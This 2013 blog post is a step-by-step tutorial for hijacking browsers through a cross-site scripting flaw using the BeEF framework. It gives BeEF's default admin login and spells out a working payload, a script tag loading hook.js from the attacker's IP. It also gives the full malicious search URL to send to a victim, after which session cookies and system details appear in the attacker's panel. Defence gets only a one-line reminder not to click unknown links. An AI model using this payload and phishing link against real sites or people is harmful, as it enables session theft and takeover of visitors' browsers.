Sunday, 15 December 2013

XSS Attack: Hacking Using BeeF XSS Framework

Still in the XSS Attack series, now we will continue from the last tutorial about finding simple XSS vulnerability to Hacking Using BeeF XSS Framework.
We already know how to find the simple cross site scripting vulnerability in a website, in this tutorial actually just the basic how you can understand the flow of XSS attack. If you still don't understand about what is XSS and the scenario in this tutorial, you can go and look the previous tutorial about finding simple XSS vulnerability.
Today tutorial will be more focus on enumeration, but if you explore by yourselves you will get more than just data enumeration :-) .
I hope you can learn by yourselves after read this tutorial. It happen the same in real life, do not expect to mastering this if you just learn about everything inside the school behind the table, you need to dig yourselves, try, try and try and put your comfort zone far away from you. Let start the tutorial :-)

Step by step Hacking Using Beef XSS Framework

1. Before we start, here is the details information I use in this tutorial.
Attacker Victim
OS: Backtrack 5
IP: 192.168.160.236
Already have XSS vulnerable website as a mediator
OS: Windows 7 Ultimate
IP: 192.168.160.104
2. We will start the BeeF XSS framework first:
XSS Attack: Hacking Using BeeF XSS Framework
if you get an error, maybe you haven't installed the beef xss framework.
3. After you run beef in the step two, a window will popped out and tell you the username and password to log in to beef admin panel. By default the username: beef and password: beef. The beef control panel should be:
http://your_ip_or_hostname:3000/ui/panel
XSS Attack: Hacking Using BeeF XSS Framework
4. This is the default display when you successfully log in to the beef xss framework control panel
XSS Attack: Hacking Using BeeF XSS Framework
5. Now let's see the information command window, inside there you can see some information how to operate the beef framework, especially how to spread the malicious javascript.
XSS Attack: Hacking Using BeeF XSS Framework
From the picture above, we must inject the hook URL address to the XSS vulnerable website.
6. Because I already have the XSS vulnerable website from the last tutorial about finding simple xss vulnerability so I just use one of it. The next step I also already prepare the code to inject in the search box
<script type=text/javascript src=http://192.168.160.236:3000/hook.js></script>
so it will look like this:
XSS Attack: Hacking Using BeeF XSS Framework
The next step attacker will copy the URL together with malicious script inside it and send it to victim. This is the URL looks like:
http://www.xss_vulnerable_website/search.asp?keyword=<script type=text/javascript src=http://192.168.160.236:3000/hook.js></script>&x=0&y=0
7. When victim click the link sent by attacker, the attacker command line window will show an activity.
XSS Attack: Hacking Using BeeF XSS Framework
Add caption

the picture above means that victim with IP 192.168.160.104 already click the malicious link with mediator xxx.com.
8. When we move to the Beef xss framework control panel, the control panel record some activity there.
XSS Attack: Hacking Using BeeF XSS Framework
9. Many information also available there including session cookie, system information, etc.
XSS Attack: Hacking Using BeeF XSS Framework
hope it useful :-)
Conclusion:
1. XSS can directly attack the user that visit a website.
2. Do not click a link that you don't know.
We will still continue the XSS attack series tutorial in the next post, keep updated. If you find this post useful, spread it! :-)

No comments: